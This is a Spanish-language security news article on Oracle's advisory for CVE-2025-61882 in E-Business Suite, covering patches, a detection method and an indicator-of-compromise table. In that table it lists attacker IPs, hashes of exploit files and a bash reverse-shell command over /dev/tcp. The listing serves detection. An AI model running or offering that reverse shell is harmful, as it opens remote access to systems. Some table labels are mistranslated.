Red Hot Cyber
La ciberseguridad se comparte. Reconozca el riesgo, combátalo, comparta sus experiencias y anime a otros a hacerlo mejor que usted.
Buscar
TM RedHotCyber 320x100 042514
Banner Ancharia Desktop 1 1
Vulnerabilidad de Oracle E-Business Suite 9.8: se necesitan actualizaciones urgentes

Vulnerabilidad de Oracle E-Business Suite 9.8: se necesitan actualizaciones urgentes

Redazione RHC : 5 octubre 2025 21:29

Oracle ha publicado un aviso de seguridad sobre una vulnerabilidad crítica identificada como CVE-2025-61882 en Oracle E-Business Suite . Esta falla puede explotarse remotamente sin autenticación , lo que podría permitir la ejecución de código malicioso en los sistemas afectados.

La compañía recomienda a sus clientes que apliquen de inmediato las actualizaciones descritas en el aviso. Oracle enfatiza la importancia de mantener las versiones de producto con soporte activo e instalar todos los parches de seguridad críticos con prontitud. En particular, la actualización de los parches críticos publicados en octubre de 2023 es un requisito previo para implementar nuevas correcciones.

Para respaldar la detección y contención inmediata de posibles ataques, la alerta incluye una matriz de riesgo con indicadores de compromiso , como direcciones IP sospechosas, comandos y archivos asociados con exploits conocidos.

Productos afectados y parches disponibles

La vulnerabilidad afecta específicamente a las versiones 12.2.3 a 12.2.14 de Oracle E-Business Suite . La documentación oficial, disponible a través de los enlaces proporcionados por Oracle, contiene información detallada sobre los parches y su instalación.

productos y versiones afectados Documento de disponibilidad de parches
Oracle E-Business Suite, versiones 12.2.3–12.2.14 Suite de negocios electrónicos de Oracle

Soporte y versiones heredadas

Los parches proporcionados a través del programa de alerta de seguridad solo están disponibles para las versiones cubiertas por Soporte Premier o Soporte Extendido según la Política de Soporte de por Vida de Oracle.

Las versiones no incluidas en estos programas no se someten a pruebas para detectar las vulnerabilidades reportadas, aunque aún puedan verse afectadas. Por este motivo, Oracle recomienda actualizar a versiones compatibles para garantizar la protección y la compatibilidad con los parches de seguridad.

Cómo comprobar si estás afectado por el error

CVE-2025-61882 afecta a Oracle E-Business Suite y se puede explotar de forma remota sin autenticación, lo que podría provocar la ejecución remota de código si se explota con éxito.

Se ha publicado en GitHub un método de detección público que ayuda a identificar instancias potencialmente obsoletas. El método marca una instancia como sospechosa cuando la página devuelve la cadena «Página de inicio de E-Business Suite» y el encabezado HTTP » Última modificación » indica una fecha anterior al 4 de octubre de 2025 (marca de tiempo Unix 1759602752 ).

Este enfoque se describe como una herramienta de detección, no como un vector de ataque , y debe utilizarse únicamente con fines de verificación y defensa. Para mitigar el riesgo, Oracle recomienda aplicar los parches descritos en el aviso de seguridad y actualizar a las versiones compatibles.

Indicadores de Compromiso (IOC)

A continuación se muestran indicadores de compromiso (direcciones IP, comandos observados y archivos) para respaldar la detección, investigación y contención inmediatas.

Indicador Tipo Descripción
200[.]107[.]207[.]26 Propiedad intelectual Actividad potencial GET y POST
185[.]181[.]60[.]11 Propiedad intelectual Actividad potencial GET y POST
sh -c /bin/bash -i >& /dev/tcp//0>&1 Dominio Establecer una conexión TCP saliente en un puerto específico
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d SHA 256 oráculo_ebs_nday_exploit_poc_dispersos_lapsus_retard_cl0p_hunters.zip
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

Immagine del sitoRedazione
Red Hot Cyber's editorial team consists of a collection of individuals and anonymous sources who actively collaborate by providing advance information and news on cyber security and IT in general.

Lista degli articoli

Artículos destacados

Immagine del sito
¡Cloudflare se cae en la magnífica nube! El incidente global se está resolviendo.
Di Redazione RHC - 18/11/2025

18 de noviembre de 2025 – Tras horas de interrupciones generalizadas , el incidente que afectó a la red global de Cloudflare parece estar cerca de resolverse. La compañía anunció que impleme...

Immagine del sito
IBM AIX: Dos fallos críticos permiten la ejecución de comandos arbitrarios (Puntuación 10 y 9,6).
Di Redazione RHC - 18/11/2025

Dos graves vulnerabilidades en el sistema operativo AIX de IBM podrían permitir a atacantes remotos ejecutar comandos arbitrarios en los sistemas afectados, lo que ha llevado a la compañía a public...

Immagine del sito
Apple deberá pagar 634 millones de dólares a Masimo por infracción de patente.
Di Redazione RHC - 18/11/2025

Masimo, una empresa estadounidense que desarrolla tecnologías de monitorización médica, ha ganado otra batalla legal contra Apple . Un jurado federal le otorgó 634 millones de dólares por infring...

Immagine del sito
Aplicaciones espía: Cómo funciona el software espía y por qué supone un riesgo para la privacidad
Di Redazione RHC - 17/11/2025

El software espía (también conocido como aplicaciones espía) representa una de las amenazas más insidiosas y peligrosas de la era digital. Se trata de programas maliciosos diseñados para infiltra...

Immagine del sito
Google está listo para lanzar Gemini 3.0: ¿será realmente el punto de inflexión en la carrera de la IA?
Di Redazione RHC - 16/11/2025

Google se acerca a la presentación oficial de Gemini 3.0 , el nuevo modelo de inteligencia artificial que representa uno de los pasos más significativos en la estrategia de la compañía. Según inf...